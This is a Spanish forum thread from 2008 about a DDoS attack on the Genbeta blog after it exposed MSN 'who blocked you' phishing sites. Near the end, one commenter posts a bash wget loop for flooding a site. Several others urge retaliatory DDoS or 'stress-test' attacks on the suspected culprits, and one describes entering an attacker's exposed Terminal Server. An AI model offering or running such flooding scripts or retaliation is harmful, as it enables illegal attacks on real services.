al respecto hay un artículo muy interesante llamado "24 servicios que pueden robar tu contraseña de Hotmail y lista de contactos" (link: http://spamloco.net/2008/02/24-servicios-que-pueden-robar-tu.html)

#33 ¿Si saca dinero es de fiar? ¡Vaya un argumento!

Estos sitios son un fraude como bien dice el artículo, lo único que pueden hacer es mostrarte la lista de personas que no te tienen en su lista, cosa muy distinta de saber quien te ha bloqueado. Lo mismo que hace por ejemplo el aMSN

http://digg.com/security/BBlogs_vs_DDOS_a_fight_for_the_freedom_of_speech

Y mi traducción: http://mla.com.es/2008/02/08/bblogs-vs-ddos-english-version/
Corregidme los fallos de traducción que haya tenido que a estas horas no rijo ¡gracias!

¡Ah! y que alguien lo copie por si acaso... que no se yo si mi hosting soportaría el efecto digg

Hay que tener en cuenta que Alejandro Sena es el propietario de Techtear.com la competencia de Genbeta.

detener un DDOS:
http://foro.elhacker.net/index.php/topic,137442.0.html

#58, no, aMSN te dice quién no te tiene en su lista de contactos, no quién te tiene "bloqueado". No es lo mismo.

C&P, Según Genbeta, sin señalar a nadie:

Sin rebuscar demasiado, algunos sitios fraudulentos que siguen esta práctica serían: blockoo.com, scanmessenger.com, detectando.com, quienteadmite.info, checkmessenger.net, blockstatus, etc… Todos ellos son potenciales phishing, y ninguno funciona más allá de recolectar cuentas de correo.

#10 voy a transcribir la noticia en mio blog, espero no importe. sobra decir que haré las respectivas referencias.

#53 La dificultad de detener un DDOS se presenta porque las máquinas atacantes son de cualquier parte del mundo. Estas máquinas están infectadas por un algún tipo de malware que las convierte en máquinas zombie, de forma que pueden atacar un objetivo cuando alguien se lo ordena.

Ale, aqui otra copia del articulo: http://paranoiasvarias.blogspot.com/2008/02/quieres-saber-quin-te-tiene-no.html
Se van a cagar estos HOYGAN mafiosos.

Tengo un pequeño servidor en casa y estoy hasta los c******s de aguantar intentos de entrada por todos lados, SSH, SMTP, HTTP, estos se merecerían que nos juntáramos todos y les pusiéramos el culo (de sus servidores) como un bebedero de patos.
Animo y paciencia.

#24 http://216.239.59.104/search?q=cache:hEZf82EDGloJ:www.genbeta.com/2007/11/13-quieres-saber-quien-te-tiene-no-admitido-en-el-msn-pues-no-des-tu-contrasena-a-desconocidos+genbeta+quieres-saber-quien-te-tiene-no-admitido-en-el-msn-pues-no-des-tu-contrasena-a-desconocidos/&hl=es&ct=clnk&cd=1&gl=es&client=firefox-a

Perdonadme que haya tardado tanto, es que mientras me cargaba la página en caché (que no sé por qué ha tardado tanto) estaba viendo el 4x01 de Perdidos y se me ha ido el tiempo

Aquí está. Y ahora más que nunca: ¡Arriba, Genbeta!

http://ipurdidantza.blogspot.com/2008/02/no-pueden-tumbarnos-todos.html

Ya está, noticia de genbeta copiada verbatim en mi blog... referenciando autoría, claro.

Estoy haciendo una lista en mi blog (está en mi perfil y en los trackbacks de esta noticia) con todos los blogs que se han solidarizado, si falta alguno dejadme un comentario o trackback

Salu2!!

#2 Los considero suficientemente serios como para hacer eso, pero es solo mi opinión.

ya están saliendo apoyos a Genbeta:
http://quenotetimenmas.blogspot.com/

tumbarán a blogger?

Mis candidatos son blockoo.com, scanmessenger.com y checkmessenger.net por descarte. blockoo está caído y los otros dos puede decirse que son clones el uno del otro, con lo que quedan dos posibles sospechosos. El autor del ataque ha tenido las pocas luces de decir que vive en Ciudad del Este, que está en Paraguay. Eso lo he hecho en 5 minutos, por lo que creo que los de Weblogs SL ya saben quién ha sido.

Me sumo a la lista de trabajadores de Weblogs SL que confirman que el ataque es real. No es, ni mucho menos, una campaña de autobombo, como se ha dicho por ahi.

#33 Yo solo me fio de campofrio.

Aleh, un blog más en el que está puesto
Como dice #24... que tumben Blogger

#50 no se trata de quien tiene que demostrar que, el hecho es que los han amenazado y han cumplido con las amenazas, un ataque DDOS no creo que sea muy legal, vamos digo yo.

No me he leído muchos de los comentarios, pero el protocolo que usa WLM SÍ que te dice quien te ha bloqueado... Sólo que el cliente de Microsoft no incluye esa feature. Pero aMSN sí.

Este titulo es más flame:
http://xkod.com.pe/seguridad/quien-me-bloquea-en-msn-messenger-lista-de-servicios-basura/

Y acusa con dedo levantado a los servicios mencionados.

http://resistancefutile.com/2008/02/03/wtf-genbetero-extremo/

Esto es la repolla, el blog del coordinador de Genbeta esta caido, y me da que no ha sido precisamente por meneame...

Esos tios son mierda

¿Hay por algún lado alguna copia para ponerlo en mi blog? A ver si hay cojones de tumbar Blogger... (smiley de cabreo)

#24 ya hay algun que otro blog asi como este: http://quenotetimenmas.blogspot.com/ puedes copiarlo de ahi x'D

Ok, he publicado también la noticia en mi blog. Que les den!

http://quetzalnet.es/index.php?id=1613

Mmmm... y devolverles la papeleta?...
Voy a investigar un rato...

sigue sin ir... y yo con el "mono" que le tengo a visitar genbeta.

Otro blog más por aquí

Bueno, liquidado, yo me apunto a esto:
http://picallo.li/?p=667
http://picallo.info/2008/02/08/solidaridad-con-genbeta/
http://picallo.wordpress.com/2008/02/08/solidaridad-con-genbeta/

Por cierto, estoy intentando acceder a Blockoo.com y la web no funciona...

ME acabo de enterar de la noticia. Yo he recibido muchos mails de empresas de ese tipo, y la verdad, hoy dia quien no sabe que no tienes que poner tu contraseña en ningun sitio? Es como el jodido correo-cadena del virus ese que destruye el sector 0 del disco duro y que provoca que el universo implosione.
A veces me dan ganas de borrar mi cuenta de correo, que de pesaos son mis contactos, alguien me los cambia?

De donde cojones son estas mafias? qué HDP!

btw a estos si que habría que hacerles un google bombing:

"quien no me tiene en el messenger" -> "b*****o.com te roba las claves y hace phising"

se les termina el negocio, siempre y claro se tenga claro que son ellos eh ^_^

#69 Ya, ya, he hecho de todo, pero no sirve de nada, servidores en china, taiwan, polonia, rusia, etc..... incluso en alguna ocasión les he dejado un mensajito directamente en el escritorio (Terminal Server accesible).

Yo les tengo una propuesta, ¿por qué no llenamos la página del hdp responsable de miles de cuentas y contraseñas falsas?

#59 En eso tienes razón, está mañana me he encontrado con un pc de un cliente que pertenecía a una botnet, enviaba correos a saco, digo que pertenecía porque ya está capado.

Bueno parece que ya la gente se cree que esto no es una maniobra de autobombo. Ahora un par de temas que se han tratado aquí, no se puede filtrar tráfico. Si se filtra el tráfico ya sea a nivel de firewall o donde sea, se conseguirá que la aplicación no procese este tráfico, lo cual aliviará muchísimo la carga y si el problema es un DoS seguramente se solucione así. El problema es que si es un DDoS super tocho el firewall no dará abasto y caerá. Y ese es el problema actual es un ataque mu grandote.

Sobre lo de distribuir el artículo me parece una muy buena idea, sobre todo la gente que tiene sus blogs en blogger, estoy seguro de que no se van a meter con google. Y si no que lo hagan que así les vemos salir con el culo rojo.

Sobre lo de denunciar, claro que puede hacerse. El problema de todo es como demostrar la autoría de los hechos, estos ataques se realizan con botnets en el extranjera, manejadas a su vez desde otros sitios y seguramente conectados a ella atraves de anonimizadores, es muy difícil

En definitiva a ver como termina todo esto, porque lo de los DDoS es un problema, pero cada vez lo va a ir siendo más y más.

el caso que hoy alguien de weblogssl me pregunto como parar el DDoS. Pero meterse con los de msn, con la de pasta que tienen y medios, pasa esto....

Yo también puedo asegurar que la noticia no es mentira, hay bastante gente trabajando en solucionarlo, no veo los beneficios de un autobombo así genbeta ahora mismo esta caida y eso no es bueno se mire como se mire.

un ddos de echo creo que es denunciable (aunque es muy dificil de demostrar) supongo que si van a juicio el juez podría pedir la revisión de los correos del sitio denunciado (bueno, ultimamente veo mucho Shark asi que.. )

y btw ya son lentos para parar el ataque con un tcpdump y unas mad skillz de iptables se soluciona en linux (vamos, que al final son siempre los mismos paquetes una y otra vez desde distintos sitios) y si usan freebsd con dummynet hasta podría ser divertido.

Yo también pertenezco a la red de Weblogs S.L. y afirmo, para quien no lo crea, que el ataque es real, tras una amenaza a la que hemos prestado poco caso, y es que a veces nos vienen algunos correos bastante curiosos.

Que contraten los servicios de Prolexic. A los de la cienciología CASI les sirve de algo

Hmm...

Sé que no es muy cívico que digamos, pero, ¿qué tal y si les devuelven el detalle de la misma manera con que quieren hacer callar a genbeta?

Existen servicios para realizar stress-test a los servers, solo es de poner el link de imágenes de la página en cuenstión y luego ya saben.

Me pregunto si no se les puede contestar para que ya dejen de molestar por decir una verdad como un templo.

#34, Gracias por el apunte ahora mismo ya se a quien achacar ciertos spams que he recibido últimamente y voy a denunciarlo a los responsables de la red que me lo envió. (La verdad es que no lo había pensado )

Creo que Blockoo la ha cagado pero bien con esto...

DDOS VS BBLOGS

Estaría bien que el tema alcanzase repercusión internacional, si algunos tenéis contactos con blogs internacionales, ya sabéis

blockoo.com está petá
No os coleis........

#74 Entonces te toca tragar al igual que a mí, la idea es que si reciben 1000 reportes de la misma IP se planteen tomar medidas. Es lo que tiene vivir en un mundo lleno de lusers en el que cualquiera tiene acceso a un ordenador sin saber las consecuencias de lo que está haciendo

La verdad es que tiene narices... Conozco varias personas que cayeron, incluso gente que se supone que trabajan con ordenadores... Pero supongo que la curiosidad mató al gato.

Pero bueno, como siempre pasa con estas cosas al final tienen el efecto contrario. A saber la cantidad de blogs que se hacen eco de esto ahora.

Saludos !

Yo si quereis hago una traducción para digg de toda la movida...

#82 a que esperas?

Genbeta es uno de los pocos blogs que mantengo en mi lista de suscripciones desde hace varios años. Siempre es útil e interesante.

#50 Creo que te equivocas, LOS QUE TIENEN QUE DEMOSTRARLO SON LOS QUE PIDEN CONTRASEÑAS, OK? Es que mas claro agua.

Y lo que es peor es la reaccion de juanquer de los energumenos...

Para los incrédulos que piensan que es autobombo... que prueben a entrar ahora (1.20 de la madrugada) que verán cómo el servidor está 100% caido, aunque afortunadamente parece que nuestro técnico lo ha arreglado en parte y sólo afecta al servidor de genbeta, no a los demás. Hemos estado unos cuantos días con caidas cada pocos minutos, y en toda la red.

Ya decia yo que no habia manera que entrase

la misma en la cache de google (para quien le interese):
http://www.google.com/search?q=cache:dWtizocDgtoJ:resistancefutile.com/2008/02/03/wtf-genbetero-extremo/

Yo también los apoyo, ¡ahora verán el poder de la blogósfera!: http://actualidadsiliconvalley.blogspot.com/2008/02/atacan-genbeta-por-no-retirar-una-de.html

Como mola eso de... ¡El poder de internet!

Unámonos todos y publiquemos-lo en nuestros respectivos blogs. Se van a CAGAR.

Creo que no estaría mal recopilar una lista de todos los blogs que se sumen a la cruzada. Aunque sea un poco de autobombo, todos los que lo hagan que publiquen el link al artículo en los comentarios. Yo por mi parte voy a hablarlo en mi blog.

Porque la poquísima credibilidad que le quedaba a esos de Blockoo (Porque es evidente que son ellos) se ha esfumado cuando han actuado de esa forma tan rastrera. Si al menos hubieran demostrado lo que dicen...

Es más, podríamos hacer lo que ellos en su propia web. Un ataque DDOS.

Como era esa horterada de "El pueblo unido..." pues ahí queda eso.

Edit: #44 te me has adelantado pero perfecto, a eso es a lo que me referia!!!! Cuando tenga mi articulo te paso el link.

Contactos con blogs internacionales? Que alguien lo meta en digg

ES LA GUERRA!! MAS MADERA!!

tambien la gente podria poner el link este por ejemplo en el nick dl messenger http://quenotetimenmas.blogspot.com/ .... la mayoria de gente que cae en estas cosas no visita meneame ni la blogosfera

#85 ya vuelve a estar operativo.

Tiene narices que se dediquen a enmierdarse de esta forma, por algo que conocen todos los usuarios que llevan un tiempo por ahí. Incautos siempre los hay, pero cuando te la cuelan en una ocasión.... no te la vuelven a colar.

Una pregunta q me hago es, ¿para que quiero saber quien me tiene bloqueado?

gracias #1

#44 Aqui teneis otro:
http://www.neutronica.es/2008/02/genbeta-hackeada/

Ya he posteado tb en mi blog, la verdad es que a mi me tocan las narices estas paginas pero esto del ataque ya se pasa de la raya...

Bueno, pues yo también me uno a la causa

Por cierto, si os aburrís mucho os dejo un pequeño script en bash para lanzar ataques DOS (con fines educativos sólo, el uso que hagáis de él no es cosa mía). Pero os recuerdo que los ataques DOS son ilegales en españa.
WAITMAX=10; WEB="http://responsable.ext"; PETS=0; while(true) do wget -q -O /dev/null "$WEB"; PETS=`expr "$PETS" + 1`;clear; echo "Enhorabuena, ya has realizado $PETS peticiones ;)"; sleep `expr $RANDOM % ( "$WAITMAX" + 1 )`; done;

No, elecTron, te equivocas tú. Es obvio que el que acusa es el que tiene que demostrar la acusación.

para no dar lugar a especuladiones que posteen los logs de los ataques

esa gentuza en mi clan se les llama "lammers"

bueno pero alguien ha probado el bloko y si hace eso q dice ?

Vaya por delante que nunca he usado estas páginas y que está claro que no funcionan porque no hay forma de saber quién no te admite (esto lo digo por la que me va a caer). Lo de que guarden y utilicen las cuentas de la gente, si se dice, hay que demostrarlo. Por supuesto que sí.

Mucha tontería con copiar el artículo de un sitio a otro, total, copiar y pegar no da trabajo. ¿Alguien se ha molestado en verificar la versión de unos y otros?

Siempre estamos igual: uno grita "INJUSTICIA" y todos los defensores de la libertad se suben al carro de la diatriba sin pensárselo dos veces.